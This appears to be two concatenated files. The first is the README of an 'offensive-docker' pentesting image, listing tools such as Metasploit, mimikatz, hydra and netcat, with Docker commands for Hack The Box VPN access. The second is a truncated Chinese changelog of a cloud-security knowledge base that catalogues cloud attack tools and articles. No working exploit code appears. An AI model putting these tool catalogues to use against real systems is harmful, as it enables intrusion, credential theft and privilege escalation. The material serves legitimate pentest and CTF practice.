- [License](#license)
## Links
- 🎬 Video: [Demos](https://asciinema.org/~aaaguirrep)
- 💬 Chat: [Discord](https://discord.gg/2uBfu8E)
- 🌟 [VPS Automation](https://github.com/aaaguirrep/offensive-docker-vps)
- 👉 [Advanced configurations](https://github.com/aaaguirrep/offensive-docker-custom)
## Features
- OS, networking, developing and pentesting tools installed.
- Connection to HTB (Hack the Box) vpn to access HTB machines.
- Popular wordlists installed: SecLists, dirb, dirbuster, fuzzdb, wfuzz and rockyou.
- Proxy service to send traffic from any browsers and burp suite installed in your local directory.
- Exploit database installed.
- Tool for cracking password.
- Linux enumeration tools installed.
- Tools installed to discovery services running.
- Tools installed to directory fuzzing.
- Monitor for linux processes without root permissions
- Zsh shell installed.
## Requirements
- Docker service installed
## Tools installed
### Operative system tools
- rdate
- vim
- zsh
- oh-my-zsh
- locate
- cifs-utils
- htop
- tree
- [gotop](https://github.com/cjbassi/gotop)
### Network tools
- traceroute
- telnet
- net-tools
- iputils-ping
- tcpdump
- openvpn
- whois
- host
- prips
- dig
### Developer tools
- git
- curl
- wget
- ruby
- go
- python
- python-pip
- python3
- python3-pip
- php
- aws-cli
- [tojson](https://github.com/tomnomnom/hacks/tree/master/tojson)
- nodejs
### :hocho: Offensive tools
#### Port scanning
- [nmap](https://github.com/nmap/nmap)
- [masscan](https://github.com/robertdavidgraham/masscan)
- [ScanPorts](https://github.com/aaaguirrep/scanPorts) created by [@s4vitar](https://github.com/s4vitar) with some improvements
- [naabu](https://github.com/projectdiscovery/naabu)
#### :mag: Recon
##### Subdomains
- [Amass](https://github.com/OWASP/Amass)
- [GoBuster](https://github.com/OJ/gobuster)
- [Knock](https://github.com/guelfoweb/knock)
- [MassDNS](https://github.com/blechschmidt/massdns)
- [Altdns](https://github.com/infosec-au/altdns)
- [spyse](https://github.com/zeropwn/spyse.py)
- [Sublist3r](https://github.com/aboul3la/Sublist3r)
- [findomain](https://github.com/Edu4rdSHL/findomain)
- [subfinder](https://github.com/projectdiscovery/subfinder)
- [spiderfoot](https://github.com/smicallef/spiderfoot)
- [haktldextract](https://github.com/hakluke/haktldextract)
##### Subdomain takeover
- [subjack](https://github.com/haccer/subjack)
- [SubOver](https://github.com/Ice3man543/SubOver)
- [tko-subs](https://github.com/anshumanbh/tko-subs)
##### DNS Lookups
- [hakrevdns](https://github.com/hakluke/hakrevdns)
##### :camera: Screenshot
- [gowitness](https://github.com/sensepost/gowitness)
- [aquatone](https://github.com/michenriksen/aquatone)
##### :spider_web: Crawler
- [hakrawler](https://github.com/hakluke/hakrawler)
- [Photon](https://github.com/s0md3v/Photon)
- [gospider](https://github.com/jaeles-project/gospider)
- [gau](https://github.com/lc/gau)
- [otxurls](https://github.com/lc/otxurls)
- [waybackurls](https://github.com/tomnomnom/waybackurls)
##### :file_folder: Search directories
- [dirsearch](https://github.com/maurosoria/dirsearch)
##### Fuzzer
- [wfuzz](https://github.com/xmendez/wfuzz)
- [ffuf](https://github.com/ffuf/ffuf)
##### Web Scanning
- [whatweb](https://github.com/urbanadventurer/WhatWeb)
- [wafw00z](https://github.com/EnableSecurity/wafw00f)
- [nikto](https://github.com/sullo/nikto)
- [arjun](https://github.com/s0md3v/Arjun)
- [httprobe](https://github.com/tomnomnom/httprobe)
- [striker](https://github.com/s0md3v/Striker)
- [hakcheckurl](https://github.com/hakluke/hakcheckurl)
- [httpx](https://github.com/projectdiscovery/httpx)
##### CMS
- [wpscan](https://github.com/wpscanteam/wpscan)
- [joomscan](https://github.com/rezasp/joomscan)
- [droopescan](https://github.com/droope/droopescan)
- [cmseek](https://github.com/Tuhinshubhra/CMSeeK)
##### Search JS
- [LinkFinder](https://github.com/GerbenJavado/LinkFinder)
- [getJS](https://github.com/003random/getJS)
- [subjs](https://github.com/lc/subjs)
#### Wordlist
- [cewl](https://github.com/digininja/CeWL)
- wordlists:
- [wfuzz](https://github.com/xmendez/wfuzz)
- [SecList](https://github.com/danielmiessler/SecLists)
- [Fuzzdb](https://github.com/fuzzdb-project/fuzzdb)
- [Dirbuster](https://github.com/daviddias/node-dirbuster)
- [Dirb](https://github.com/v0re/dirb)
- [Rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)
- [all.txt](https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a)
- crunch
#### Git repositories
- [gitleaks](https://github.com/zricethezav/gitleaks)
- [gitrob](https://github.com/michenriksen/gitrob)
- [gitGraber](https://github.com/hisxo/gitGraber)
- [github-search](https://github.com/gwen001/github-search)
- [GitTools](https://github.com/internetwache/GitTools)
#### OWASP
- [sqlmap](https://github.com/sqlmapproject/sqlmap)
- [XSStrike](https://github.com/s0md3v/XSStrike)
- [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss)
- [dalfox](https://github.com/hahwul/dalfox)
- [jwt_tool](https://github.com/ticarpi/jwt_tool)
- [jaeles](https://github.com/jaeles-project/jaeles)
#### :iphone: Mobile
- [apktool](https://ibotpeaches.github.io/Apktool/)
#### Brute force
- [crowbar](https://github.com/galkan/crowbar)
- [hydra](https://github.com/vanhauser-thc/thc-hydra)
- [patator](https://github.com/lanjelot/patator)
- medusa
#### Cracking
- [hashid](https://github.com/psypanda/hashID)
- [john the ripper](https://github.com/magnumripper/JohnTheRipper)
- [hashcat](https://github.com/hashcat/hashcat)
#### OS Enumeration
- [htbenum](https://github.com/SolomonSklash/htbenum)
- [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
- [linenum](https://github.com/rebootuser/LinEnum)
- [enum4linux](https://github.com/portcullislabs/enum4linux)
- [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
- [PEASS - Privilege Escalation Awesome Scripts SUITE](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
- [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng)
- [smbmap](https://github.com/ShawnDEvans/smbmap)
- [pspy - unprivileged Linux process snooping](https://github.com/DominicBreuker/pspy)
- smbclient
- ftp
#### Exploits
- [searchsploit](https://github.com/offensive-security/exploitdb)
- [Metasploit](https://github.com/rapid7/metasploit-framework)
- [MS17-010](https://github.com/worawit/MS17-010)
- [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010)
- [PrivExchange](https://github.com/dirkjanm/PrivExchange)
#### Windows
- [evil-winrm](https://github.com/Hackplayers/evil-winrm)
- [impacket](https://github.com/SecureAuthCorp/impacket)
- [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
- [Nishang](https://github.com/samratashok/nishang)
- [Juicy Potato](https://github.com/ohpe/juicy-potato)
- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
- [pass-the-hash](https://github.com/byt3bl33d3r/pth-toolkit)
- [mimikatz](https://github.com/gentilkiwi/mimikatz)
- gpp-decrypt
#### Reverse shell
- [netcat](https://github.com/diegocr/netcat)
- [rlwrap](https://github.com/hanslub42/rlwrap)
#### Other resources
- [pentest-tools](https://github.com/gwen001/offensive-tools) from [@gwen001](https://github.com/gwen001)
- [qsreplace](https://github.com/tomnomnom/qsreplace) from [@tomnomnom](https://github.com/tomnomnom)
### Custom functions
- NmapExtractPorts from [@s4vitar](https://github.com/s4vitar)
### Other services
- apache2
- squid
## :memo: Documentation
See the project's [wiki](https://github.com/aaaguirrep/offensive-docker/wiki) for documentation.
## :hammer_and_wrench: Usage
You can use the docker image by the next two options:
### Option 1 - Use the github repository
git clone --depth 1 https://github.com/aaaguirrep/offensive-docker.git
cd offensive-docker
docker build -t offensive-docker .
docker run --rm -it --name my-offensive-docker offensive-docker /bin/zsh
### Option 2 - Use the image from docker hub
Use image from docker hub: [aaaguirrep/offensive-docker](https://hub.docker.com/r/aaaguirrep/offensive-docker)
docker pull aaaguirrep/offensive-docker
docker run --rm -it --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh
### Considerations to run the container
There are differents use cases for use the image and you should know how to run the container properly.
1. Use the container to access HTB (Hack the Box) machines by HTB vpn.
docker run --rm -it --cap-add=NET_ADMIN --device=/dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh
2. Share information from your local directory to container directory and save information on your local directory. You should save information under /offensive directory.
docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh
3. Expose internal container services (apache, squid) for your local environment.
docker run --rm -it --name my-offensive-docker -p 80:80 -p 3128:3128 aaaguirrep/offensive-docker /bin/zsh
Inside the container start apache2 and squid services by the aliases.
apacheUp
squidUp
4. Mount directories by umount command.
docker run --rm -it --privileged --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh
5. Tools are downloaded in /tools directory.
## :gear: Nice configurations
You can set up the docker image with nice configurations like as:
### 1. Configure credentials in the docker
To use access keys, tokens or API Keys in the docker review the next repo [Offensive Docker Custom](https://github.com/aaaguirrep/offensive-docker-custom)
### 2. Alias to connect to HTB (Hack the Box) VPN
To use both options you should use -v option to map local directoty with /offensive container directory.
#### Option 1 - HTB VPN using github repository
Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container with the -v option.
RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc
#### Option 2 - HTB VPN using docker hub image
Create a new Dockerfile with the next steps, build a new image and run a new container with -v option.
FROM aaaguirrep/offensive-docker
# Create a shortcut and load the ovpn file from workstation
RUN echo "alias vpnhtb=\"openvpn /offensive/path/to/ovpn/file\"" >> /root/.zshrc
### 3. Save and load command history in your local environment
When you delete a container all information is deleted incluide command history. The next configuration provides you an option for save the command history in your local environment and load it when you run a new container. So, you wont lose your command history when run a new container.
To use both options you should use -v option to map local directoty with /offensive container directory.
#### Option 1 - Command history using github repository
Add the next line in step "Create shorcuts" in Dockerfile, build a new image and run a new container.
# Save and load command history in your local environment
RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc
#### Option 2 - Command history using docker hub image
Create a new Dockerfile with the next steps, build a new image and run a new container.
FROM aaaguirrep/offensive-docker
# Save and load command history in your local environment
RUN sed -i '1i export HISTFILE="/history/.zsh_history"' /root/.zshrc
## :white_check_mark: Environment tested
The image was tested in the following environments:
- Docker service for Mac: Docker version 19.03.5, build 633a0ea
- Docker service for Linux instance on Google Cloud Platform: Docker version 19.03.6, build 369ce74a3c
- Docker service for Linux droplet on Digital Ocean: Docker version 19.03.6, build 369ce74a3c
## :warning: Warning
- Do not save information on container directories because it will be lost after delete the container, you should save information in your local environment using the parameter -v when you run the container. For instance:
docker run --rm -it -v /path/to/local/directory:/offensive --name my-offensive-docker aaaguirrep/offensive-docker /bin/zsh
The above command specify a path local directory mapped with /offensive container directory. You should save all information under /offensive directory.
- Use hashcat and john the ripper on controlled environments as CTF. You can experiment issues.
## :coffee: Donations
Thanks for your donations, are always appreciated.
While I drink the coffee I check more tools to add in the docker image.
[![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/aaaguirrep)
## Contributors
Thank you to all our [contributors](https://github.com/aaaguirrep/offensive-docker/graphs/contributors)!
## Contributing
[Contributing Guide](CONTRIBUTING.md)
## :chart_with_upwards_trend: Stargazers over time
[![Stargazers over time](https://starchart.cc/aaaguirrep/offensive-docker.svg)](https://starchart.cc/aaaguirrep/offensive-docker)
## License
[MIT](LICENSE)
Copyright (c) 2020, Arsenio Aguirre
|
---
title: 更新日志
---
<center><h1>更新日志</h1></center>
---
## 2023.7.16
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「曾哥」师傅补充的文库信息,感谢「曾哥」师傅贡献的以下文章:
<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《云业务 AccessKey 标识特征整理》<a href="/CloudService/more" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「曾哥」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.7.15
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「DVKunion」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/cloudsecurityresources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云原生实验室博客</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「DVKunion」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>AWS 攻击知识库 WeirdAAL (英文)</li>
<li>云安全资讯(英文)</li>
<li>云原生实验室博客</li>
<li>云计算市场资讯(英文)</li>
<li>TeamsSix</li>
<li>0xd4y</li>
<li>Andy Robbins</li>
<li>Beau Bullock</li>
<li>Chris Farris</li>
<li>Christophe Tafani-Dereeper</li>
<li>Dirk-jan</li>
<li>Dr. Nestori Syynimaa</li>
<li>Emilien Socchi</li>
<li>Fabian Bader</li>
<li>gafnit</li>
<li>inversecosᵘʷᵘ</li>
<li>Jason Ostrom</li>
<li>Joosua Santasalo</li>
<li>Karl</li>
<li>Kfzz1</li>
<li>Liv Matan</li>
<li>Marco Lancini</li>
<li>Melvin langvik</li>
<li>Merill</li>
<li>mx7krshell</li>
<li>Nathan McNulty</li>
<li>Nick Frichette</li>
<li>Nikhil Mittal</li>
<li>Nir Ohfeld</li>
<li>Rhino Security Labs</li>
<li>Roberto Rodriguez</li>
<li>rootsecdev</li>
<li>rvrsh3ll</li>
<li>Ryan Hausknecht</li>
<li>Sami Lamppu</li>
<li>Sean Metcalf</li>
<li>Seth Art</li>
<li>Shir Tamari</li>
<li>Skyworship</li>
<li>Thomas Naunheim</li>
<li>AWS 认证解决方案架构师-助理 AWS Certified Solutions Architect – Associate</li>
<li>Azure 基础知识认证 Azure Fundamentals</li>
<li>GCP 云工程师助理 Associate Cloud Engineer</li>
<li>Kubernetes 认证安全专家 Certified Kubernetes Security Specialist (CKS)</li>
<li>阿里云专业工程师 Alibaba Cloud Certified Professional (ACP)</li>
<li>阿里云云计算架构师 Alibaba Cloud Certified Expert - Cloud Computing (ACE)</li>
<li>基础设施关系绘制工具 Cartography</li>
<li>适用于 AWS 和 Azure 的扫描工具 SkyArk</li>
<li>权限升级路径分析工具 PurplePanda</li>
<li>云上攻击模拟工具 Leonidas</li>
<li>开源的轻量级云管平台 CloudExplorer Lite</li>
<li>红队云操作系统 RedCloudOS/li>
<li>云服务枚举工具 cloud service enum</li>
<li>AWS 文档 GPT 工具</li>
<li>AWS 官方 CLI 工具</li>
<li>AWS 环境分析工具 CloudMapper</li>
<li>AWS 常见配置错误审计工具 YATAS</li>
<li>Route53/CloudFront 漏洞评估工具</li>
<li>检测多云环境中存在 dangling DNS 记录的工具 findmytakeover</li>
<li>Azure 官方 CLI 工具</li>
<li>Azure MFA 检测工具</li>
<li>Azure AD 和 Office 365 的 PowerShell 管理模块 AADInternals</li>
<li>GCP 官方 CLI 工具</li>
<li>GCP 资源枚举工具</li>
<li>GCP 攻击面资源枚举工具</li>
<li>GCP 资源分析工具 Hayat</li>
<li>GCP IAM 权限收集工具 gcp-iam-collector</li>
<li>Google Workspace 目录转储工具 Google Workspace Directory Dump Tool</li>
<li>阿里云官方 CLI 工具</li>
<li>腾讯云官方 CLI 工具</li>
<li>华为云 OBS 官方管理工具 OBS Browser+</li>
<li>天翼云对象存储连接工具</li>
<li>AWS 渗透工具集 aws-pentest-tools</li>
<li>AWS Lambda 密码喷洒工具 CredKing</li>
<li>AWS 渗透测试工具 Endgame</li>
<li>AWS 红队利用脚本 Redboto</li>
<li>AWS 域控卷影拷贝工具 CloudCopy</li>
<li>Azure 安全评估 PowerShell 工具包 MicroBurst</li>
<li>Azure AD 利用工具集 ROADtools</li>
<li>枚举、喷洒、渗透 O365 AAD 帐户工具 TeamFiltration</li>
<li>Azure JWT 令牌操作工具集 TokenTactics</li>
<li>Microsoft 365 安全工具箱 DCToolbox</li>
<li>滥用 Microsoft 365 OAuth 授权流程进行网络钓鱼攻击的概念验证脚本 Microsoft365_devicePhish</li>
<li>Azure AD 身份保护 Cookie 重放测试工具</li>
<li>GCP 利用工具集</li>
<li>GCP Bucket 枚举工具 GCPBucketBrute</li>
<li>GCP Token 复用工具</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.7.9
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「zunlongzhou」师傅补充的文库信息,感谢「zunlongzhou」师傅补充文章 <a href="/cloudnative/docker/docker-use-notes.html" target="_blank">《Docker 使用笔记》</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「zunlongzhou」师傅,感谢支持<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《WIZ IAM 挑战赛 Writeup》<a href="/cloudservice/iam/the_big_iam_challenge_writeup.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Ma1tobiose」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/cloudsecurityresources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>开源的云原生安全平台 HummerRisk</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「Ma1tobiose」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.7.5
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 使用手册增加 CF 更新日志页面,详见:<a href="/CF/Changelog" target="_blank"> CF 更新日志 </a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 使用手册增加 CF 答疑页面,详见:<a href="/CF/More/cfQA.html" target="_blank"> CF 使用答疑 </a><br/>
</p>
</a-timeline-item>
<a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《聊聊我为什么选择云安全》<a href="/About/why_i_choose_cloud_security.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.7.1
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 发布 0.5.0 版本,更新内容详见 <a href="/CF/Changelog/v0_5_0.html" target="_blank"> CF 云环境利用框架现已更新至 0.5.0 版本 </a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.6.9
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>常规云服务业务侧攻防视角研究</li>
<li>记一次打穿云上内网的攻防实战</li>
<li>云原生之 Kubernetes 安全</li>
<li>RCE 进入内网接管 K8s 并逃逸进 xx 网</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「k.so」师傅补充的文库信息,感谢「k.so」师傅贡献的以下文章:
<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《RCE 进入内网接管 K8s 并逃逸进 xx 网》<a href="/CloudNative/Kubernetes/k8s-practical-exercise-1.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「k.so」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.6.4
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《CF 云环境利用框架最佳实践》<a href="/cf/cases/cf_best_practices.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.5.17
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「cr」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>在线免费的 AWS 渗透测试靶场 Free AWS Security Labs</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.5.13
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《获取无法直接执行命令的 Windows 实例权限》<a href="/CloudService/EC2/get-ecs-windows-permission.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.4.29
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 发布 v0.4.5 版本,更新<a href="/cf/" target="_blank"> CF 使用手册 </a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.3.16
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Kfzz1」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>CI/CD 靶场部署工具</li>
<li>GCP 靶场部署工具 GCPGoat</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.3.9
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云渗透技巧 HackTricks Cloud(英文)</li>
<li>云风险百科(英文)</li>
<li>CIS Benchmarks 下载页(英文)</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《AWS CloudFront 未配置默认根对象的风险简单分析》<a href="/CloudService/CloudFront/" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2023.1.19
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「happi0」师傅补充的文库信息,感谢「happi0」师傅贡献的以下文章:
<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《从脏管道(CVE-2022-0847)到 Docker 逃逸》<a href="/CloudNative/Docker/CVE-2022-0847-dirty-pipe.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「happi0」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.12.26
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>火线安全每日云安全资讯</li>
<li>腾讯云鼎每日云安全资讯</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.12.20
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Kfzz1」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云渗透笔记 CloudPentestCheatsheets(英文)</li>
<li>多云资产收集工具 cloudlist</li>
<li>BloodHound 收集 Azure 数据工具 AzureHound</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.12.16
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>云安全向导</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Kfzz1」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Azure AD 信息收集工具 AzureGraph</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.12.13
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 发布 v0.4.4 版本,更新<a href="/cf/" target="_blank"> CF 使用手册 </a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.12.4
<p></p>
<br>
<template>
<a-timeline>
<a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>CF 发布 v0.4.3 版本,更新<a href="/cf/" target="_blank"> CF 使用手册 </a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.11.25
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>AWS 安全公告(英文)</li>
<li>0xd4y Hacking in the Cloud(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.11.10
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>devops 资讯(英文)</li>
<li>0xd4y 博客(英文)</li>
<li>GCP 渗透测试笔记(英文)</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.11.4
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「一生热爱」师傅补充的文库信息,感谢「一生热爱」师傅贡献的以下文章:
<br/>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《K8s 集群渗透》<a href="/CloudNative/Kubernetes/k8s-cluster-penetration.html" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.11.3
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>AWS 枚举(第一部分)(英文)</li>
<li>AWS 权限提升(英文)</li>
<li>AWS IAM 权限枚举工具 Principal Mapper</li>
<li>AWS IAM 权限枚举工具 enumerate-iam</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.11.2
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>《Hands-On AWS Penetration Testing with Kali Linux》</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="red">收到补充</a-tag>收到「Kfzz1」师傅补充的文库信息,感谢支持,补充内容详情请见<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>版块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>Azure 靶场 AzureGoat</li>
</ul>
</p>
</a-timeline-item><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>文库<a href="/" target="_blank"> 首页 </a>贡献者添加「Kfzz1」师傅,感谢支持<br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.10.31
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>绿盟技术博客</li>
<li>CNCF</li>
<li>容器魔方</li>
<li>云计算D1net</li>
<li>云原生社区动态</li>
<li>大可不加冰</li>
<li>一次简单的"云"上野战记录</li>
<li>S3 公开存储桶密钥扫描工具 S3cret Scanner</li>
<li>AWS Redshift JDBC Driver RCE</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.10.19
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
<li>HashiCorp 博客(英文)</li>
<li>PeoplActive 博客(英文)</li>
<li>AK 等敏感信息查找工具 trufflehog</li>
</ul>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.10.2
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="blue">新增文章</a-tag>《安装 CF》<a href="/CF/Config" target="_blank">文章地址</a><br/>
</p>
</a-timeline-item>
</a-timeline>
</template>
## 2022.9.26
<p></p>
<br>
<template>
<a-timeline><a-timeline-item>
<p>
<a-tag color="green">文库动态</a-tag>更新<a href="/CloudSecurityResources/" target="_blank"> 云安全资源 </a>板块,补充信息摘要如下:<br/>
<br/>
<ul>
